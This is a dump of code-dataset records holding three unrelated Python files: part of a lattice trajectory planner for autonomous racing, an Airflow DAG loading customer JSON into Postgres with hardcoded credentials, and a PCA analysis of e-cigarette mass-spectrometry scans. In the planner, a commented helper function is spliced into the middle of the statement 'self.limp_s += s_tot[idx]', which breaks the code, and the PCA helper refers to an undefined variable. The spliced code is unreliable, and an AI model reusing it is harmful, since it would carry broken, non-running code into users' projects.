trajectory_generator_utils.get_traj_list_cost(states_list, new_states_list, self.cost_weights, self.waypoints, self.prev_traj, parameters_list, other_prev_traj, np.array([other_prev_param]), opp_relative_weights, opp_collision)\n #traj_costs[0,:] = trajectory_generator_utils.get_lane_cost_traj_list_nonnumba(states_list, num_traj, self.speed_lut, self.lut_resolution)\n traj_costs[4, :] = trajectory_generator_utils.get_s_cost_wlut(states_list, num_traj, self.waypoints, self.speed_lut_numba, self.lut_resolution)\n traj_costs[9, :] = trajectory_generator_utils.get_range_costs(states_list, num_traj, self.range_lut_numba, self.lut_resolution)\n traj_costs[12, :] = trajectory_generator_utils.get_progress_costs(end_xy, opp_relative_weights, num_traj, self.speed_lut_numba, self.lut_resolution)\n # traj_costs[14, :] = np.zeros((num_traj, ))\n\n # summing with cost weights\n traj_costs_final = trajectory_generator_utils.sum_cost(traj_costs, self.cost_weights)\n\n empty_cost_flag = False\n is_inf_flag = False\n safety_flag = False\n\n try:\n # lowest_cost_idx = np.argmin(traj_costs_final)\n non_inf_idx = np.where(np.isfinite(traj_costs_final))[0]\n non_inf_costs = traj_costs_final[non_inf_idx]\n k = min(self.TOP_POP_NUM - 1, non_inf_costs.shape[0])\n lowest_cost_idx_top = np.argpartition(non_inf_costs, k)[:k+1]\n lowest_cost_idx = np.argmin(non_inf_costs[lowest_cost_idx_top])\n lowest_cost_idx = lowest_cost_idx_top[lowest_cost_idx]\n lowest_cost_idx = non_inf_idx[lowest_cost_idx]\n\n # print(traj_costs[:, lowest_cost_idx])\n # /np.sum(traj_costs[:, lowest_cost_idx]))\n\n # dxdy = filtered_grid[lowest_cost_idx, 0:2]\n # cond = self.corner(current_s)\n # if np.isinf(traj_costs_final[lowest_cost_idx]):\n # is_inf_flag = True\n # self.prev_flow = None\n # else:\n best_traj = new_states_list[lowest_cost_idx*trajectory_generator.NUM_STEPS:(lowest_cost_idx+1)*trajectory_generator.NUM_STEPS, :]\n self.prev_traj = best_traj\n pp_traj = np.empty((best_traj.shape[0], 4))\n pp_traj[:, 0:2] = best_traj[:, 0:2]\n pp_traj[:, 2] = best_traj[:, 4]\n pp_traj[:, 3] = best_traj[:, 2]\n self.prev_flow = (filtered_flow[non_inf_idx, :])[lowest_cost_idx_top, :]\n self.prev_param = parameters_list[lowest_cost_idx, :]\n self.is_limping = False\n self.limp_s = 0.\n\n except ValueError:\n empty_cost_flag = True\n is_inf_flag = True\n self.prev_flow = None\n\n if empty_cost_flag or is_inf_flag:\n #safety_flag = True\n #states_list_plot = None\n #prev_traj_plot = None\n #pp_traj = self.waypoints[:, 0:4]\n safety_flag = False\n states_list_plot = None\n pp_traj, prev_traj_plot = self.getLimpParameters(pose_x, pose_y, current_vel)\n else:\n states_list_plot = states_list\n prev_traj_plot = self.prev_traj\n\n return pp_traj, safety_flag, self.prev_flow, states_list_plot, prev_traj_plot, lookup_grid\n\n def getLimpParameters(self, pose_x, pose_y, current_vel):\n # NEW\n s_tot = np.linspace(0,self.prev_param[0],trajectory_generator.NUM_STEPS)\n s_tot -= s_tot[0]\n _, _, _, idx = pure_pursuit_utils.nearest_point_on_trajectory_py2(np.array([pose_x, pose_y]), self.prev_traj[:,:2])\n idx = min(idx,self.prev_traj.shape[0]-3)\n s_idx = s_tot[idx:]\n s_idx -= s_idx[0]\n temp_traj = np.empty((trajectory_generator.NUM_STEPS, 5))\n temp_traj[:,:4] = trajectory_generator_utils.multiInterp2(np.linspace(0,s_idx[-1],trajectory_generator.NUM_STEPS), s_idx, self.prev_traj[idx:,:4])\n temp_traj[:,4] = np.concatenate([np.geomspace(current_vel,0.4,BRAKE_STEPS), 0.4*np.ones((temp_traj.shape[0]-BRAKE_STEPS,))])\n self.prev_traj = temp_traj\n self.limp_s += 
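# The selection above first drops infinite (infeasible) costs, then uses
# np.argpartition to examine only the TOP_POP_NUM cheapest candidates. Note
# that k = min(TOP_POP_NUM - 1, non_inf_costs.shape[0]) can push the kth
# index out of bounds when only one or two finite candidates remain;
# clamping to size - 1, as sketched here, avoids that:
import numpy as np

def pick_best(costs, top_k=3):
    finite_idx = np.where(np.isfinite(costs))[0]
    if finite_idx.size == 0:
        return None                      # every candidate is infeasible
    k = min(top_k - 1, finite_idx.size - 1)
    top = np.argpartition(costs[finite_idx], k)[:k + 1]
    best = top[np.argmin(costs[finite_idx][top])]
    return finite_idx[best]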
s_tot[idx]\n self.prev_param[0] = s_idx[-1]\n self.is_limping = True\n # END NEW\n # OLD\n #self.prev_traj[:,4] = np.concatenate([np.geomspace(self.prev_traj[0,4],0.4,BRAKE_STEPS), 0.4*np.ones((self.prev_traj.shape[0]-BRAKE_STEPS,))])\n # END OLD\n prev_traj_plot = self.prev_traj\n pp_traj = np.empty((self.prev_traj.shape[0], 4))\n pp_traj[:, 0:2] = self.prev_traj[:, 0:2]\n pp_traj[:, 2] = self.prev_traj[:, 4]\n pp_traj[:, 3] = self.prev_traj[:, 2]\n return pp_traj, prev_traj_plot\n\n\n def compute_action(self, pp_traj, safety_flag, pose, off_policy=False):\n pose_x, pose_y, pose_theta = pose\n\n if safety_flag:\n next_speed, next_steer = self._pure_pursuit(pose_x, pose_y, pose_theta, pp_traj, self.track_lad)\n next_steer = self.STEER_LP*next_steer+(1-self.STEER_LP)*self.prev_steer\n\n elif off_policy:\n next_speed, next_steer = self._pure_pursuit(pose_x, pose_y, pose_theta, self.waypoints[:, 0:4], self.track_lad)\n next_steer = self.STEER_LP*next_steer+(1-self.STEER_LP)*self.prev_steer\n\n else:\n next_speed, next_steer = self._pure_pursuit(pose_x, pose_y, pose_theta, pp_traj, self.track_lad)\n\n self.prev_steer = next_steer\n\n return next_speed, next_steer\n\ndef getLimpParametersStatic(pose_x, pose_y, current_vel, prev_traj_self, prev_param_self):\n # NEW\n prev_traj = np.copy(prev_traj_self)\n prev_param = np.copy(prev_param_self)\n s_tot = np.linspace(0, prev_param[0], trajectory_generator.NUM_STEPS)\n s_tot -= s_tot[0]\n _, _, _, idx = pure_pursuit_utils.nearest_point_on_trajectory_py2(np.array([pose_x, pose_y]), prev_traj[:,:2])\n idx = min(idx, prev_traj.shape[0]-3)\n s_idx = s_tot[idx:]\n s_idx -= s_idx[0]\n temp_traj = np.empty((trajectory_generator.NUM_STEPS, 5))\n temp_traj[:,:4] = trajectory_generator_utils.multiInterp2(np.linspace(0,s_idx[-1],trajectory_generator.NUM_STEPS), s_idx, prev_traj[idx:,:4])\n temp_traj[:,4] = np.concatenate([np.geomspace(current_vel,0.4,BRAKE_STEPS), 0.4*np.ones((temp_traj.shape[0]-BRAKE_STEPS,))])\n prev_traj = temp_traj\n extra_limp_s = s_tot[idx]\n prev_param[0] = s_idx[-1]\n # END NEW\n # OLD\n #self.prev_traj[:,4] = np.concatenate([np.geomspace(self.prev_traj[0,4],0.4,BRAKE_STEPS), 0.4*np.ones((self.prev_traj.shape[0]-BRAKE_STEPS,))])\n # END OLD\n pp_traj = np.empty((prev_traj.shape[0], 4))\n pp_traj[:, 0:2] = prev_traj[:, 0:2]\n pp_traj[:, 2] = prev_traj[:, 4]\n pp_traj[:, 3] = prev_traj[:, 2]\n return pp_traj, prev_traj, prev_param, extra_limp_s\n\nclass RobustLatticePlanner(LatticePlanner):\n def __init__(self, map_path, waypoints, directory, cost_weights=None, is_ego=False):\n # cost_weights is one cost weights, for ego car / plan_robust, cost_weights_list is list of cost weights of other guys, for opponents / plan_multiple\n super().__init__(map_path, cost_weights, waypoints, directory, is_ego)\n\n def plan_multiple(self, pose, opp_pose, sampled_flow_list, other_prev_traj, other_prev_param, ds, current_vel, picked_cost_weights, picked_belief):\n # how to deal with similarity cost: highest belief from last\n # sampled_flow_list is (3d: num_arms_pulled x num_samples x 6)\n\n current_vel = max(0.01, current_vel)\n pose_x, pose_y, pose_theta = pose\n num_guys = picked_belief.shape[0]\n\n output_traj_list = [None]*num_guys\n output_param_list = [None]*num_guys\n\n if other_prev_traj is None or other_prev_param is None:\n # what ego thinks the other guys think about what ego wants to do\n other_prev_param = np.array([5., 0, 0, 0, 0])\n other_prev_traj = np.zeros((trajectory_generator.NUM_STEPS, 5))\n temp = np.linspace(0., 5., 
trajectory_generator.NUM_STEPS)\n other_prev_traj[:, 0] = opp_pose[0]+temp*np.cos(opp_pose[2])\n other_prev_traj[:, 1] = opp_pose[1]+temp*np.sin(opp_pose[2])\n other_prev_traj[:, 4] = trajectory_generator_utils.WAYPOINT_SPEED\n\n if self.prev_traj is None or self.prev_param is None:\n self.prev_param = np.array([5., 0, 0, 0, 0])\n self.prev_traj = np.zeros((trajectory_generator.NUM_STEPS, 5))\n temp = np.linspace(0., 5., trajectory_generator.NUM_STEPS)\n self.prev_traj[:, 0] = pose[0]+temp*np.cos(pose[2])\n self.prev_traj[:, 1] = pose[1]+temp*np.sin(pose[2])\n self.prev_traj[:,2] = pose[2]\n self.prev_traj[:, 4] += trajectory_generator_utils.WAYPOINT_SPEED\n self.prev_steer = 0.0\n return [self.prev_traj]*num_guys, [self.prev_param]*num_guys\n\n # stack the output and transform into 2d matrix\n sampled_flow_stacked = sampled_flow_list.reshape((sampled_flow_list.shape[0]*sampled_flow_list.shape[1], sampled_flow_list.shape[2]))\n # start = time.time()\n # lookup_grid, current_s, new_s = self.flow_to_xytheta(sampled_flow_stacked[:, 0:3], pose)\n\n lookup_grid, current_s, new_s, corner_on = flow_to_xytheta_static(sampled_flow_stacked[:, 0:3], np.array(pose), self.waypoints, self.lut_resolution, self.speed_lut_numba, self.WINDOW_SIZE, self.CURVATURE_THRESH, self.CORNER_ON)\n self.CORNER_ON = corner_on\n # print('flow_to_xytheta multiple numba time', time.time()-start)\n # lookup_grid will be (2d: num_arms_pulled*num_samples x 3)\n # current_s and new_s are (num_arms_pulled*num_samples, )\n\n if lookup_grid is None:\n # car's current pose not in lut\n # pp_traj = self.waypoints[:, 0:4]\n pp_traj, prev_traj, prev_param, extra_limp_s = getLimpParametersStatic(pose_x, pose_y, current_vel, self.prev_traj, self.prev_param)\n self.prev_traj = prev_traj\n self.prev_param = prev_param\n self.limp_s += extra_limp_s\n return [prev_traj]*num_guys, [self.prev_param]*num_guys\n\n kappa0 = trajectory_generator.get_curvature_command(np.roll(self.prev_param,-1), ds+self.limp_s) if self.prev_param is not None else 0.0\n\n # traj lookup\n rot = self._rotation_matrix(pose_theta, (0, 0, 1))\n states_list_local, parameters_list, filtered_flow_list, num_traj_list = trajectory_generator_utils.grid_lookup_parallel(lookup_grid, self.lut_x, self.lut_y, self.lut_theta, self.lut_kappa, self.lut, kappa0, self.lut_stepsizes, num_guys, sampled_flow_list)\n\n for i in range(len(num_traj_list)):\n if num_traj_list[i] == 0:\n pp_traj, prev_traj, prev_param, _ = getLimpParametersStatic(pose_x, pose_y, current_vel, self.prev_traj, self.prev_param)\n output_traj_list[i] = prev_traj\n output_param_list[i] = prev_param\n\n states_list = trajectory_generator_utils.trans_traj_list_multiple(states_list_local, np.array([[pose_x], [pose_y], [0.0]]), rot)\n\n # check for zero numtraj guys:\n for i in range(len(num_traj_list)):\n if num_traj_list[i] == 0:\n states_list[i] = output_traj_list[i]\n parameters_list[i] = output_param_list[i][None, :]\n # num_traj_list[i] = 1\n\n # dspeed_list = [filtered_flow[:, 3:] for filtered_flow in filtered_flow_list]\n dspeed_list = List()\n for filtered_flow in filtered_flow_list:\n dspeed_list.append(np.ascontiguousarray(filtered_flow[:, 3:]))\n new_states_list = trajectory_generator_utils.get_velocity_profile_multiple(states_list, self.waypoints, dspeed_list, num_traj_list, current_vel)\n\n for i in range(len(num_traj_list)):\n if num_traj_list[i] == 0:\n num_traj_list[i] = 1\n\n # cost calculation\n \n\n opp_relative_weights = np.array([1.])\n\n traj_costs_list, end_xy_list = 
trajectory_generator_utils.get_traj_list_cost_multiple(states_list, new_states_list, picked_cost_weights, self.waypoints, self.prev_traj, parameters_list, other_prev_traj, np.array([other_prev_param]), opp_relative_weights)\n # traj_costs[0,:] = trajectory_generator_utils.get_lane_cost_traj_list_nonnumba(states_list, num_traj, self.speed_lut, self.lut_resolution)\n trajectory_generator_utils.get_s_cost_wlut_multiple(traj_costs_list, states_list, num_traj_list, self.waypoints, self.speed_lut_numba, self.lut_resolution)\n trajectory_generator_utils.get_range_costs_multiple(traj_costs_list, states_list, num_traj_list, self.range_lut_numba, self.lut_resolution)\n trajectory_generator_utils.get_progress_costs_multiple(traj_costs_list, end_xy_list, opp_relative_weights, num_traj_list, self.speed_lut_numba, self.lut_resolution)\n\n # summing with cost weights\n traj_costs_final_list = trajectory_generator_utils.sum_cost_multiple(traj_costs_list, picked_cost_weights)\n\n empty_cost_flag = False\n is_inf_flag = False\n safety_flag = False\n\n lowest_cost_idx_list = [np.argmin(traj_costs_final_list[i]) for i in range(num_guys)]\n picked_traj_list = [new_states_list[i][lowest_cost_idx_list[i]*trajectory_generator.NUM_STEPS:(lowest_cost_idx_list[i]+1)*trajectory_generator.NUM_STEPS, :] for i in range(num_guys)]\n picked_params_list = [parameters_list[i][lowest_cost_idx_list[i], :] for i in range(num_guys)]\n\n max_belief_idx = np.argmax(picked_belief)\n\n # go to limp mode if max belief cost is inf\n # also change picked traj for all inf cost guys to limp mode?\n for i in range(num_guys):\n if np.isinf(traj_costs_final_list[i][lowest_cost_idx_list[i]]):\n pp_traj, prev_traj, prev_param, extra_limp_s = getLimpParametersStatic(pose_x, pose_y, current_vel, self.prev_traj, self.prev_param)\n if max_belief_idx == i:\n self.limp_s += extra_limp_s\n picked_params_list[i] = prev_param\n picked_traj_list[i] = prev_traj\n elif max_belief_idx == i:\n self.limp_s = 0.\n\n self.prev_param = picked_params_list[max_belief_idx]\n self.prev_traj = picked_traj_list[max_belief_idx]\n\n return picked_traj_list, picked_params_list\n\n def plan_robust(self, pose, opp_pose, sampled_flow, other_prev_traj, other_prev_param, ds, current_vel, picked_idx_count, ballsize):\n current_vel = max(0.01, current_vel)\n pose_x, pose_y, pose_theta = pose\n # other prev_traj and prev_param are lists, could have repeats\n # lookup_grid, current_s, new_s = self.flow_to_xytheta(sampled_flow[:, 0:3], pose)\n lookup_grid, current_s, new_s, corner_on = flow_to_xytheta_static(sampled_flow[:, 0:3], np.array(pose), self.waypoints, self.lut_resolution, self.speed_lut_numba, self.WINDOW_SIZE, self.CURVATURE_THRESH, self.CORNER_ON)\n self.CORNER_ON = corner_on\n if lookup_grid is None:\n safety_flag = False\n states_list_plot = None\n pp_traj, prev_traj_plot = self.getLimpParameters(pose_x, pose_y, current_vel)\n self.prev_flow = None\n return pp_traj, safety_flag, self.prev_flow, states_list_plot, prev_traj_plot, lookup_grid\n kappa0 = trajectory_generator.get_curvature_command(np.roll(self.prev_param,-1), ds+self.limp_s) if self.prev_param is not None else 0.0\n \n emp_w = 1. 
* picked_idx_count / np.sum(picked_idx_count)\n # traj lookup\n rot = self._rotation_matrix(pose_theta, (0, 0, 1))\n # start = time.time()\n states_list_local, parameters_list, filtered_flow, filtered_grid, filtered_new_s = trajectory_generator_utils.grid_lookup(lookup_grid, self.lut_x, self.lut_y, self.lut_theta, self.lut_kappa, self.lut, sampled_flow, new_s, kappa0, self.lut_stepsizes)\n num_traj = parameters_list.shape[0]\n # print('grid lookup time', time.time()-start)\n\n if num_traj == 0:\n safety_flag = False\n states_list_plot = None\n pp_traj, prev_traj_plot = self.getLimpParameters(pose_x, pose_y, current_vel)\n self.prev_flow = None\n return pp_traj, safety_flag, self.prev_flow, states_list_plot, prev_traj_plot, lookup_grid\n\n states_list = trajectory_generator_utils.trans_traj_list(states_list_local, np.array([[pose_x], [pose_y], [0.0]]), rot)\n\n dspeed = filtered_flow[:, 3:]\n # start = time.time()\n new_states_list = trajectory_generator_utils.get_velocity_profile(states_list, self.waypoints, dspeed, num_traj, current_vel)\n # print('get vel profile time', time.time()-start)\n\n\n # cost calculation\n\n # TODO: move this to plan multiple so it never returns None\n # if other_prev_traj is None or other_prev_param is None:\n # other_prev_param = np.array([[5., 0, 0, 0, 0]])\n # other_prev_traj = np.zeros((trajectory_generator.NUM_STEPS, 5))\n # other_prev_traj[:, 0] = np.linspace(opp_pose[0], opp_pose[0]+5., trajectory_generator.NUM_STEPS)\n # other_prev_traj[:, 4] += 8.\n # self.prev_flow = None\n\n if self.prev_traj is None or self.prev_param is None:\n self.prev_param = np.array([5., 0, 0, 0, 0])\n self.prev_traj = np.zeros((trajectory_generator.NUM_STEPS, 5))\n temp = np.linspace(0., 5., trajectory_generator.NUM_STEPS)\n self.prev_traj[:, 0] = pose[0]+temp*np.cos(pose[2])\n self.prev_traj[:, 1] = pose[1]+temp*np.sin(pose[2])\n self.prev_traj[:,2] = pose[2]\n self.prev_traj[:, 4] += trajectory_generator_utils.WAYPOINT_SPEED\n self.prev_flow = None\n self.prev_steer = 0.0 \n prev_traj_plot = self.prev_traj\n pp_traj = np.empty((self.prev_traj.shape[0], 4))\n pp_traj[:, 0:2] = self.prev_traj[:, 0:2]\n pp_traj[:, 2] = self.prev_traj[:, 4]\n pp_traj[:, 3] = self.prev_traj[:, 2]\n return pp_traj, False, self.prev_flow, None, prev_traj_plot, lookup_grid\n\n # opp_relative_weights = np.array([1.])\n\n # start = time.time()\n traj_costs, end_xy, long_cost = trajectory_generator_utils.get_traj_list_cost_robust(states_list, new_states_list, self.cost_weights, self.waypoints, self.prev_traj, parameters_list, other_prev_traj, other_prev_param, emp_w)\n # print('traj list cost robust', time.time() - start)\n # traj_costs[0,:] = trajectory_generator_utils.get_lane_cost_traj_list_nonnumba(states_list, num_traj, self.speed_lut, self.lut_resolution)\n # start = time.time()\n traj_costs[4, :] = trajectory_generator_utils.get_s_cost_wlut(states_list, num_traj, self.waypoints, self.speed_lut_numba, self.lut_resolution)\n # print('4 cost', time.time()-start)\n # start = time.time()\n traj_costs[9, :] = trajectory_generator_utils.get_range_costs(states_list, num_traj, self.range_lut_numba, self.lut_resolution)\n # print('9 cost', time.time()-start)\n # traj_costs[13, :] = trajectory_generator_utils.get_progress_costs(end_xy, opp_relative_weights, num_traj, self.speed_lut, self.lut_resolution)\n # start = time.time()\n progress_cost = trajectory_generator_utils.get_progress_costs_robust(end_xy, long_cost.shape[0], num_traj, self.speed_lut_numba, self.lut_resolution)\n # print('progress cost 
robust time', time.time()-start)\n # traj_costs[14, :] = np.zeros((num_traj, ))\n\n combined_robust_cost = trajectory_generator_utils.get_robust_cost(long_cost, self.cost_weights[11], progress_cost, self.cost_weights[12], picked_idx_count, ballsize)\n\n # summing with cost weights\n traj_costs_final = trajectory_generator_utils.sum_cost(traj_costs, self.cost_weights[:-2]) + combined_robust_cost\n\n empty_cost_flag = False\n is_inf_flag = False\n safety_flag = False\n\n try:\n # lowest_cost_idx = np.argmin(traj_costs_final)\n non_inf_idx = np.where(np.isfinite(traj_costs_final))[0]\n non_inf_costs = traj_costs_final[non_inf_idx]\n k = min(self.TOP_POP_NUM - 1, non_inf_costs.shape[0])\n lowest_cost_idx_top = np.argpartition(non_inf_costs, k)[:k+1]\n lowest_cost_idx = np.argmin(non_inf_costs[lowest_cost_idx_top])\n lowest_cost_idx = lowest_cost_idx_top[lowest_cost_idx]\n lowest_cost_idx = non_inf_idx[lowest_cost_idx]\n\n # print(traj_costs[:, lowest_cost_idx])\n # /np.sum(traj_costs[:, lowest_cost_idx]))\n\n # dxdy = filtered_grid[lowest_cost_idx, 0:2]\n # cond = self.corner(current_s)\n # if np.isinf(traj_costs_final[lowest_cost_idx]):\n # is_inf_flag = True\n # self.prev_flow = None\n # else:\n best_traj = new_states_list[lowest_cost_idx*trajectory_generator.NUM_STEPS:(lowest_cost_idx+1)*trajectory_generator.NUM_STEPS, :]\n self.prev_traj = best_traj\n pp_traj = np.empty((best_traj.shape[0], 4))\n pp_traj[:, 0:2] = best_traj[:, 0:2]\n pp_traj[:, 2] = best_traj[:, 4]\n pp_traj[:, 3] = best_traj[:, 2]\n self.prev_flow = (filtered_flow[non_inf_idx, :])[lowest_cost_idx_top, :]\n self.prev_param = parameters_list[lowest_cost_idx, :]\n self.is_limping = False\n self.limp_s = 0.\n\n except ValueError:\n empty_cost_flag = True\n is_inf_flag = True\n self.prev_flow = None\n\n if empty_cost_flag or is_inf_flag:\n #safety_flag = True\n #states_list_plot = None\n #prev_traj_plot = None\n #pp_traj = self.waypoints[:, 0:4]\n safety_flag = False\n states_list_plot = None\n pp_traj, prev_traj_plot = self.getLimpParameters(pose_x, pose_y, current_vel)\n else:\n states_list_plot = states_list\n prev_traj_plot = self.prev_traj\n # print('\\n')\n return pp_traj, safety_flag, self.prev_flow, states_list_plot, prev_traj_plot, lookup_grid\n","sub_path":"python/mpc/lattice_planner.py","file_name":"lattice_planner.py","file_ext":"py","file_size_in_byte":38694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"491607582","text":"import pandas as pd\r\nimport json\r\nfrom sqlalchemy import create_engine\r\n\r\nimport airflow\r\nfrom airflow.models import DAG,Variable\r\nfrom airflow.operators.python_operator import PythonOperator\r\nfrom datetime import datetime, date\r\n\r\nargs = {\r\n 'owner': 'airflow',\r\n 'start_date': datetime(2020, 3, 2),\r\n 'depends_on_past': False,\r\n 'email': ['jesse.mikkola@houston-analytics.com']\r\n}\r\n\r\ndag = DAG(\r\n dag_id='kotipizza_customers_json_to_db',\r\n default_args=args,\r\n schedule_interval='0 5 * * *',\r\n max_active_runs=1\r\n)\r\n\r\n\r\ndef json_to_db():\r\n\tdf = pd.read_json(\"/home/houston/data_land/koti_custo_customers.json\")\r\n\r\n\tprint(df)\r\n\r\n\tengine = create_engine('postgresql://postgres:docker@localhost:5432/test_data')\r\n\t#These 2 lines added to drop table, haven't tested\r\n\tsql = 'DROP TABLE IF EXISTS kotipizza_customers;'\r\n\tresult = engine.execute(sql)\r\n\r\n\tdf.to_sql('kotipizza_customers', engine)\r\n\r\n\r\ndag_products = 
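A standalone sketch of the "lowest finite cost from a top-k pool" selection used in the `try` block above; the cost values and `TOP_POP_NUM` are made up. An all-inf cost array makes `argpartition` raise `ValueError`, which the planner catches as its limp-mode case.

```python
import numpy as np

costs = np.array([3.0, np.inf, 1.5, 2.7, np.inf, 0.9])
TOP_POP_NUM = 3

finite_idx = np.where(np.isfinite(costs))[0]         # drop inf trajectories
finite_costs = costs[finite_idx]
k = min(TOP_POP_NUM - 1, finite_costs.shape[0])
top_pool = np.argpartition(finite_costs, k)[:k + 1]  # unordered k+1 smallest
best = top_pool[np.argmin(finite_costs[top_pool])]   # exact argmin within pool
print(finite_idx[best], costs[finite_idx[best]])     # -> 5 0.9
```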
PythonOperator(\r\n\ttask_id='kotipizza_customers_json_to_db',\r\n\tpython_callable=json_to_db,\r\n\tdag=dag,\r\n\t)\r\n\r\n\r\n","sub_path":"DAGs/customers_fetch_insert.py","file_name":"customers_fetch_insert.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"250387837","text":"'''pca comparing e-cigarettes\njuul\nHalo(G7)\nBlu\n'''\n\nimport csv, matplotlib.pyplot as plt, numpy as np\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\n\n\n# constants\nMZSTART = 15\nMZEND = 400\nINDEX = 1\nNUMBER_OF_CIG = 3\nNUMBER_OF_IONS = 8\n# precursor ion list \nH3O = 19 #index 0\nNO = 30 #index 1\nO2 = 32 #index 2 pos, 3 neg\nOH = 17 #index 4\nO = 16 #index 5\nNO2 = 46 #index 6\nNO3 = 62 #index 7\n\n\nfiles = [\n# trial 1 \n'mass-scan-pos-neg-4-13-18-4600-20180622-142124.csv', #g6\n'mass-scan-pos-neg-4-13-18-4607-20180622-150245.csv', #juul\n'mass-scan-pos-neg-4-13-18-4608-20180622-151114.csv', #blu\n#trial 2\n'mass-scan-pos-neg-4-13-18-4619-20180622-184858.csv', #g6\n'mass-scan-pos-neg-4-13-18-4615-20180622-182527.csv', #juul\n'mass-scan-pos-neg-4-13-18-4623-20180622-190449.csv', #blu\n#trial 3\n'mass-scan-pos-neg-4-13-18-4663-20180625-174200.csv', #g6\n'mass-scan-pos-neg-4-13-18-4659-20180625-172435.csv', #juul\n'mass-scan-pos-neg-4-13-18-4667-20180625-180620.csv', # blu\n#trial 4\n'mass-scan-pos-neg-4-13-18-4697-20180626-160732.csv', #g6\n'mass-scan-pos-neg-4-13-18-4690-20180626-153051.csv', #juul\n'mass-scan-pos-neg-4-13-18-4701-20180626-162915.csv', #blu\n#trial 5\n'mass-scan-pos-neg-4-13-18-4840-20180628-172915.csv', #g6\n'mass-scan-pos-neg-4-13-18-4836-20180628-171152.csv', #juul\n'mass-scan-pos-neg-4-13-18-4841-20180628-173842.csv', #blu\n#trial 6\n'mass-scan-pos-neg-4-13-18-4897-20180702-165302.csv', # g6\n'mass-scan-pos-neg-4-13-18-4893-20180702-162712.csv', # juul\n'mass-scan-pos-neg-4-13-18-5115-20180710-124320.csv', # blu\n# trial 7\n'mass-scan-pos-neg-4-13-18-5110-20180710-122638.csv', # g6\n'mass-scan-pos-neg-4-13-18-5098-20180709-191303.csv', # juul\n'mass-scan-pos-neg-4-13-18-5122-20180710-131215.csv' # blu\n]\n\n\n# helper function - standardization bef pca \ndef getStd(vals):\n\tstdComp = []\n\tfor val in vals:\n\t\tcomp.append(StandardScaler().fit_transform(val))\n\treturn stdComp\n\n\n# helper functions for visualization\n# add label when in order of g6/juul/blu\ndef getlabel(index):\n\t'''if index % NUMBER_OF_CIG == 0:\n\t\treturn 'G6 '+ str(index/3)\n\telif index % NUMBER_OF_CIG == 1 :\n\t\treturn 'Juul ' + str(index/3)\n\telse:\n\t\treturn 'Blu ' + str(index/3)'''\n\tif index % NUMBER_OF_IONS == 0:\n\t\treturn 'H3O+'\n\telif index % NUMBER_OF_IONS == 1:\n\t\treturn 'NO+'\n\telif index % NUMBER_OF_IONS == 2:\n\t\treturn 'O2+'\n\telif index % NUMBER_OF_IONS == 4:\n\t\treturn 'O2-'\n\telif index % NUMBER_OF_IONS == 5:\n\t\treturn 'O-'\n\telif index % NUMBER_OF_IONS == 6:\n\t\treturn 'OH-'\n\telif index % NUMBER_OF_IONS == 7:\n\t\treturn 'NO2-'\n\telse:\n\t\treturn 'NO3-'\n\n# helper functions for visualization \n# add label for each ions\ndef getcolor(index):\n\tif index % NUMBER_OF_IONS == 0:\n\t\treturn 'red'\n\telif index % NUMBER_OF_IONS == 1:\n\t\treturn 'blue'\n\telif index % NUMBER_OF_IONS == 2:\n\t\treturn 'green'\n\telif index % NUMBER_OF_IONS == 4:\n\t\treturn 'purple'\n\telif index % NUMBER_OF_IONS == 5:\n\t\treturn 'orange'\n\telif index % NUMBER_OF_IONS == 6:\n\t\treturn 'brown'\n\telif index % NUMBER_OF_IONS == 7:\n\t\treturn 
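A sketch of how the DAG's load step could avoid the `DROP TABLE` statement flagged above as untested: `to_sql` can drop and recreate the table itself with `if_exists="replace"`. The file path and connection string are the ones already used by the DAG; everything else is unchanged.

```python
import pandas as pd
from sqlalchemy import create_engine

def json_to_db():
    df = pd.read_json("/home/houston/data_land/koti_custo_customers.json")
    engine = create_engine("postgresql://postgres:docker@localhost:5432/test_data")
    # if_exists="replace" drops and recreates the table in one call;
    # index=False keeps the DataFrame index out of the table
    df.to_sql("kotipizza_customers", engine, if_exists="replace", index=False)
```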
'olive'\n\telse:\n\t\treturn 'pink'\n\n# import data from csv files \n# crucial data structure extracted across diff files \ndata_H3O, data_NO, data_O2pos, data_O2neg, data_OH, data_O, data_NO2, data_NO3 = ([] for i in range(8))\n\nfor file in files:\n\twith open('p_e_' + file, 'r') as csv_file:\n\t\tcsv_reader = csv.reader(csv_file)\n\t\tarray1, array2, array3, array4, array5, array6, array7, array8 = ([] for i in range(8))\n\n\t\tfor line in csv_reader: \n\t\t\tif(line[0]==str(H3O) and int(line[1]) < (MZEND + 1)):\n\t\t\t\tarray1.append(float(line[2]))\n\t\t\telif(line[0]==str(NO) and int(line[1]) < (MZEND + 1)):\n\t\t\t\tarray2.append(float(line[2]))\n\t\t\telif(line[0]==str(O2) and int(line[1]) < (MZEND + 1)):\n\t\t\t\tif len(array3) < (MZEND - MZSTART + 1):\n\t\t\t\t\tarray3.append(float(line[2]))\n\t\t\t\telse:\n\t\t\t\t\tarray4.append(float(line[2]))\n\t\t\telif(line[0]==str(O) and int(line[1]) < (MZEND + 1)):\n\t\t\t\tarray5.append(float(line[2]))\n\t\t\telif(line[0]==str(OH) and int(line[1]) < (MZEND + 1)):\n\t\t\t\tarray6.append(float(line[2]))\n\t\t\telif(line[0]==str(NO2) and int(line[1]) < (MZEND + 1)):\n\t\t\t\tarray7.append(float(line[2]))\n\t\t\telif(line[0]==str(NO3) and int(line[1]) < (MZEND + 1)):\n\t\t\t\tarray8.append(float(line[2]))\n\n\t\tdata_H3O.append(array1)\n\t\tdata_NO.append(array2)\n\t\tdata_O2pos.append(array3)\n\t\tdata_O2neg.append(array4)\n\t\tdata_O.append(array5)\n\t\tdata_OH.append(array6)\n\t\tdata_NO2.append(array7)\n\t\tdata_NO3.append(array8)\n\ndata = [data_H3O, data_NO, data_O2pos, data_O2neg, data_OH, data_O, data_NO2, data_NO3]\nY = []\npca = PCA(n_components=2)\n\n\n# standardize then run pca analysis\nfor d in data:\n\tstd_data = StandardScaler().fit_transform(d)\n\tY.append(pca.fit_transform(std_data))\n\n# rendering PCA data \n#fig = plt.figure(figsize=(10,6))\n\ni = 0\nfor y in Y:\n\tplt.scatter(y[:,0], y[:,1], marker='o', alpha=0.7, color=getcolor(i), label=getlabel(i))\n\ti += 1\n\t\nplt.xlabel('First Principal Component')\nplt.ylabel('Second Principal Component')\nplt.title('PCA analysis of 7 trials with minimal 